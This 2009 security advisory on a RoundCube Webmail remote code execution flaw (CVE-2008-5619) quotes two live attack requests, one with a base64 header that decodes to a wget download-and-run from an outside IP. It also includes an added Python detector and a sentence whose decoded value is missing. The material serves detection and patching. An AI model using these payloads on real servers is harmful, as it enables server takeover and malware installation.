RoundCube Webmail Vulnerabilities Being Targeted

Friday, March 27, 2009


Priority: MEDIUM

Impact: Potential for system compromise or site being used as attack launchpoint.

Resolution: Upgrade to the latest version of RoundCube Webmail
Verify software version and blocking policy in Breach appliance.

Who: Any organization using older versions of the RoundCube Webmail application may be vulnerable.

What: The html2text.php page of RoundCube Webmail calls the preg_replace function with the eval (/e) modifier on data the client controls, so PHP code embedded in a request is evaluated on the server.  The vulnerability allows remote clients to execute arbitrary code.  It is tracked as CVE-2008-5619.

How: Breach Security Labs has been monitoring data posted at the SANS Internet Storm Center (ISC) and correlating it with data gathered at Breach Security customer sites, and we have identified the following real attack vectors targeting this vulnerability.

  1. Standard Attack Payload

    This example is taken from the RoundCube issue tracker - http://trac.roundcube.net/ticket/1485618.  The attacker sends a PHP system() call in the POST body.  If the attack succeeds, the response returns the output of uname -a, disclosing OS and kernel details.

      POST /rc/bin/html2text.php HTTP/1.1
      Host: www.example.com
      Pragma: no-cache
      Accept: */*
      Content-Type: ''
      Connection: Keep-Alive
      Content-Length: 28

      <b>{${system(uname -a)}}</b>

  2. Use of Base64_Decode Evasion

    The following example was identified both at the SANS ISC and in Breach customer traffic.  In order to bypass basic negative security filters that look for specific OS command injection payloads, this attack variant places the Base64-encoded command payload in the Accept request header and uses EVAL(BASE64_DECODE(...)) in the POST body to decode and run it.  Note that the function names are written in upper case: PHP function names are case-insensitive, so case-sensitive signatures for eval or base64_decode miss this variant.

      POST /roundcube/bin/html2text.php HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
      Host: www.example.com
      Accept: cGFzc3RocnUoImNkIC90bXA7d2dldCA4NS4yMTQuNjQuMjI1L3djdWJlO2NobW9kICt
      4IHdjdWJlOy4vd2N1YmUgPi9kZXYvbnVsbCAyPi9kZXYvbnVsbCAmIik7

      Content-Length: 54

      <b>{${EVAL(BASE64_DECODE($_SERVER[HTTP_ACCEPT]))}}</b>
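The two request shapes above are what a detection rule has to catch: PHP complex-syntax interpolation (`{${ ... }}`) in the POST body, and a dangerous PHP callable hidden inside a base64-encoded request header. The following Python is an added example written for this page, not code from Breach Security or the RoundCube project. The sample requests are constructed to mirror the advisory's two payloads; the base64 Accept value is our own and decodes to a harmless `passthru("id");`, and the finding labels are invented names for illustration.

```python
import base64
import binascii
import re

# Constructed sample requests modelled on the two attack shapes in the advisory.
SAMPLE_STANDARD = (
    "POST /rc/bin/html2text.php HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "Content-Length: 28\r\n"
    "\r\n"
    "<b>{${system(uname -a)}}</b>"
)

# Constructed Accept value: base64 of passthru("id"); (not the advisory's payload).
SAMPLE_EVASION = (
    "POST /roundcube/bin/html2text.php HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "Accept: " + base64.b64encode(b'passthru("id");').decode() + "\r\n"
    "Content-Length: 54\r\n"
    "\r\n"
    "<b>{${EVAL(BASE64_DECODE($_SERVER[HTTP_ACCEPT]))}}</b>"
)

# Constructed benign request: a normal html2text conversion.
SAMPLE_BENIGN = (
    "POST /roundcube/bin/html2text.php HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "Accept: text/html,application/xhtml+xml\r\n"
    "Content-Length: 20\r\n"
    "\r\n"
    "<b>Hello, world</b>"
)

# PHP "complex syntax" interpolation {${ ... }} is what preg_replace /e evaluates;
# it has no legitimate reason to appear in an HTML message body sent to html2text.
COMPLEX_SYNTAX = re.compile(r"\{\$\{")
# Dangerous PHP callables, matched case-insensitively because PHP function names
# are case-insensitive (the evasion sample writes EVAL and BASE64_DECODE).
PHP_EXEC = re.compile(
    r"\b(eval|system|passthru|exec|shell_exec|popen|base64_decode)\s*\(", re.I)
# A header value that looks like a bare base64 token rather than a normal value.
B64_TOKEN = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")


def parse_request(raw):
    """Split a raw HTTP request into (request line, {header: value}, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def decode_b64_headers(headers):
    """Return {header: decoded text} for header values that decode as base64."""
    decoded = {}
    for name, value in headers.items():
        if not B64_TOKEN.match(value):
            continue
        try:
            raw = base64.b64decode(value, validate=True)
        except (binascii.Error, ValueError):
            continue
        decoded[name] = raw.decode("utf-8", errors="replace")
    return decoded


def inspect_request(raw):
    """Return a list of finding labels (hypothetical names) for one request."""
    _, headers, body = parse_request(raw)
    findings = []
    if COMPLEX_SYNTAX.search(body):
        findings.append("php_complex_syntax_in_body")
    if PHP_EXEC.search(body):
        findings.append("php_exec_function_in_body")
    # The evasion variant pulls its real payload out of a request header.
    if "$_server[" in body.lower():
        findings.append("body_references_request_header")
    for name, text in decode_b64_headers(headers).items():
        if PHP_EXEC.search(text):
            findings.append("php_exec_function_in_base64_header:" + name)
    return findings


if __name__ == "__main__":
    for label, sample in [("standard", SAMPLE_STANDARD),
                          ("evasion", SAMPLE_EVASION),
                          ("benign", SAMPLE_BENIGN)]:
        print(label, inspect_request(sample))
```

The body checks alone already flag both variants, because the decode-and-eval wrapper must itself sit in the body; decoding headers adds the second, independent signal (and the decoded command for the incident record) so that a future variant which renames or splits the wrapper is still caught by its payload.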

Impact: The impact of a successful compromise is severe as it can result in the web server becoming part of a Botnet.  The decoded value of the Accept header data is: 

These commands attempt to make the web server download and run exploit toolkit code.

Risk: Factoring in the fact that this vulnerability is actively being targeted and that an update is available, the severity for web sites is MEDIUM.  If no upgrade or patch were available, this would have been rated higher.

Resolution:
Update the RoundCube Webmail software

Install the latest version or apply the security patch listed here.

Verify the version and blocking policy in the Breach appliance
WebDefend 3.5 collaborative attack detection capabilities are able to identify this type of attack in multiple ways including the PHP Base64_Decode obfuscation/evasion technique.

Contact:
For more information on this alert and other web application security news, please visit Breach Security Labs or email support@breach.com.